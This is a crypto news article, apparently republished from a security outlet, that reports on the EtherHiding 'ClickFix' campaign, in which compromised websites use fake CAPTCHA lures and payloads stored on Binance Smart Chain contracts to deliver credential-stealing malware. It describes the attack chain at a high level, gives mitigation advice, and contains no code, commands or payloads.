Security

Web3 Users Compromised by EtherHiding Malware Campaign via JavaScript Injection

Threat actors are leveraging compromised websites and four BSC contracts to deploy credential-stealing malware, bypassing traditional network defenses.
November 30, 20253 min

Four dark blue, rectangular modules are arranged centrally in a cross pattern, encased by a translucent, web-like structure. The background is a soft, light grey, emphasizing the central technical components
A luminous, geometric object resembling a cut diamond with a white digital interface and a ribbed edge floats against a dark, abstract background. This visual metaphor embodies the sophisticated mechanics of crypto asset securitization and the underlying blockchain infrastructure

Briefing

A sophisticated, multi-stage attack dubbed ‘ClickFix’ is actively targeting Web3 users by compromising legitimate websites with malicious JavaScript injections. The primary consequence is the theft of user credentials and private keys via common stealers like AMOS and Vidar, leading directly to wallet draining. This campaign achieves high stealth and resilience by using the “EtherHiding” technique, which stores the final-stage malware payload across four separate smart contracts deployed on the Binance Smart Chain.

The image displays a sophisticated, angular device featuring a metallic silver frame and translucent, flowing blue internal components. A distinct white "1" is visible on one of the blue elements

Context

The prevailing threat landscape has seen a critical increase in supply chain attacks, where threat actors compromise a trusted third-party service to inject malicious code into front-end interfaces. This exploit leverages the inherent trust users place in legitimate websites and exploits the lack of comprehensive security measures that scan for malicious data hidden in on-chain state. The architecture bypasses conventional network-level security tools that typically block known malware delivery domains.

A prominent abstract structure dominates the foreground, composed of numerous dark blue, sharp-edged crystalline elements clustered around two smooth white spheres. This entire formation is encircled by a continuous, smooth white ring, with similar out-of-focus structures in the background

Analysis

The attack chain initiates when a user visits a compromised website, triggering a malicious JavaScript inject that displays a fake CAPTCHA check, the ‘ClickFix’ lure. This script then executes the “EtherHiding” vector, querying a set of four smart contracts on the Binance Smart Chain to retrieve a Base64-encoded payload. A critical “gate contract” controls the delivery, allowing the threat actor to selectively enable or disable the attack by altering on-chain state.

This mechanism ultimately serves an OS-specific stealer that harvests credentials and private keys. The use of the immutable blockchain as a command-and-control server makes the payload highly resistant to takedown attempts.

The image presents a dynamic visual of a central vortex composed of swirling blue and white digital patterns, drawing the eye towards a core hub. This hub is defined by four prominent, sleek white rectangular components radiating from a central axis, suggesting a functional mechanism within a digital ecosystem

Parameters

  • Attack Vector Obfuscation → Four smart contracts on BSC used for payload storage and delivery.
  • Infection Method → Malicious JavaScript injection on compromised legitimate websites.
  • Payload Stealers → AMOS and Vidar malware families.
  • Control Mechanism → On-chain state change via a “gate contract” to toggle the attack.

The image features a sophisticated mechanical assembly composed of blue and silver gears, shafts, and rings, intricately intertwined. White granular particles are scattered around and within these components, while a transparent, syringe-like element extends from the left

Outlook

Immediate mitigation requires all Web3 users to exercise extreme caution with any unexpected CAPTCHA or wallet-signing request, regardless of the host website’s apparent legitimacy. For protocols, this incident establishes a new security standard mandating continuous monitoring for third-party script integrity and the integration of on-chain forensic tools to identify malicious data storage patterns. The technique of using blockchain state for C2 infrastructure is a contagion risk that will likely be adopted by other sophisticated threat actors, necessitating a shift in defense from network-level to on-chain data analysis.

A contemporary office space is depicted with its floor partially submerged in reflective water and covered by mounds of white, granular material resembling snow or foam. Dominating the midground are two distinct, large circular forms: one a transparent, multi-layered ring structure, and the other a solid, textured blue disc

Verdict

This EtherHiding campaign represents a significant escalation in Web3 attack sophistication, demonstrating that threat actors are successfully leveraging the blockchain’s immutability as an undetectable command-and-control infrastructure.

supply chain attack, malicious javascript inject, on-chain payload delivery, smart contract obfuscation, credential stealer malware, private key theft, wallet draining scam, social engineering lure, Base64 encoded payload, Binance Smart Chain, gate contract logic, multi-stage infection, web3 security threat, front-end compromise, remote code execution, OS specific malware Signal Acquired from → thehackernews.com

Micro Crypto News Feeds

wallet draining

Definition ∞ Wallet Draining is a malicious activity where an attacker illicitly transfers funds from a victim's digital wallet.

supply chain

Definition ∞ A supply chain is the network of all the individuals, companies, resources, activities, and technologies involved in the creation and sale of a product, from the delivery of source materials from the supplier to the manufacturer, through to its eventual sale to the end consumer.

smart chain

Definition ∞ A Smart Chain is a type of blockchain network specifically designed to support the execution of smart contracts and decentralized applications.

private keys

Definition ∞ Private keys are secret cryptographic codes that grant exclusive access and control over a user's digital assets on a blockchain.

javascript injection

Definition ∞ JavaScript Injection is a cyberattack where malicious JavaScript code is inserted into a website.

malware

Definition ∞ Malware is malicious software designed to infiltrate and damage computer systems or steal sensitive information.

contract

Definition ∞ A 'Contract' is a set of rules and code that automatically executes when predefined conditions are met.

on-chain

Definition ∞ On-chain refers to any transaction or data that is recorded and validated directly on a blockchain ledger, making it publicly verifiable and immutable.

web3

Definition ∞ Web3 represents the conceptual evolution of the internet, aiming for a decentralized architecture built upon blockchain technology and distributed ledger systems.

Tags:

Tags: